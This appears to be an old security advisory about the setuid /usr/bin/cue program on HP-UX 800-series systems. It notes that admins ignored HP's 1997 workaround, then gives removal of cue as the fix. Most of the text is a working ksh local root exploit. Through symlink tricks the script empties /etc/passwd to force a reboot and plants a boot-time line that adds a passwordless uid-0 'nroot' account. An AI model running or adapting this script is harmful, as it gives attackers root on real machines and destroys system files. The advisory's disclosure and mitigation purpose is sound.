COMMAND

    cue

SYSTEMS AFFECTED

    HPUX / 800 models

PROBLEM

    Emilie Chang posted following.   One of the major problems  we see
    with admins/security nowadays  is  that  admin don't secure  their
    host: they install patches ...which is slightly different.

    It reminds  us of  this (very)  old advisory  which was  issued by
    HP in 1997 (!!!) about /usr/bin/cue. In the "Workarounds/Solution"
    section, the advice was to :

        # chmod 400 /usr/bin/cue

    or

        # chgrp trusted /usr/bin/cue
        # chmod 4750 /usr/bin/cue

    ...but  admins  just  don't  read  advisories.   They patch... and
    there was no patch  for cue.  This  explains why most of  big HPUX
    servers are still vulnerable.

    Let's remember the "Scriptors of  Doom" days!  Local root  exploit
    below.

    #!/usr/bin/ksh
    
    ##
    ## THIS IS A DANGEROUS SCRIPT !!! READ THE CODE PRIOR TO ./!
    ##
    ## This is just a proof of concept. Don't use for malicious
    ## purpose. If ever you decide to run that script, please
    ## read the code carefully before!
    ##
    ## Emilie Chang, 2001. Dedicated to Scriptors of Doom and HERT
    ## people. Good job sweethearts.
    ##
    ## Old-styled exploit, tested on HPUX 10.20, model 899
    ## Warning : /usr/bin/cue exists on HPUX 800 models only
    ##
    ## Let's test the model by the way...
    ##
    
    MODEL=`/usr/bin/model | awk -F '/' '{print $2}'`
    export MODEL
    
    if [ $MODEL -lt 800 -o $MODEL -gt 899 ]
    then
         echo "Your host doesn't look like a HPuX 8** model, stopping now."
         exit
    fi
    
    ##
    ## Test whether /usr/bin/cue exists or not...
    ##
    
    if [ ! -u /usr/bin/cue ]
    then
         echo "/usr/bin/cue doesn't exist or it's not setuid 0. Stopping now."
         exit
    fi
    
    ##
    ## Well you passed the above tests. Going on playing.
    ## Creating a file within /etc/rc.config.d : It will
    ## be executed at next reboot (which might happen
    ## soon)
    ##
    
    TTY=`tty | awk -F '/' '{print $3}'`
    export TTY
    
    TERM=whatevah
    export TERM
    
    umask 000
    ln -s /etc/rc.config.d/laninit IDMERROR.$TTY
    /usr/bin/cue > /dev/null 2> /dev/null
    
    ##
    ## Inserting evil root account within /etc/passwd
    ##
    
    echo "cp /tmp/passwd /etc/passwd" >> /etc/rc.config.d/laninit
    echo "echo \"nroot::0:3:n:/:/sbin/sh\" >> /etc/passwd" >> /etc/rc.config.d/laninit
    echo "rm /etc/rc.config.d/laninit" >> /etc/rc.config.d/laninit
    
    ##
    ## Now saving the passwd file, which we are about to empty
    ##
    
    cp /etc/passwd /tmp/passwd
    
    ##
    ## passwd file destruction
    ## (SOMEONE SET US UP THE BOMB !!)
    ##
    
    rm IDMERROR.$TTY
    ln -s /etc/passwd IDMERROR.$TTY
    /usr/bin/cue > /dev/null 2> /dev/null
    
    ##
    ## *POOF*, now that the /etc/passwd file is emptied, admin
    ## MUST reboot to get things done.
    ##
    
    echo "Your nroot account will be created within /etc/passwd"
    echo "with no password. Remove it asap, it's just a proof"
    echo "of concept!"
    
    # The end.

SOLUTION

    Remove cue from the system.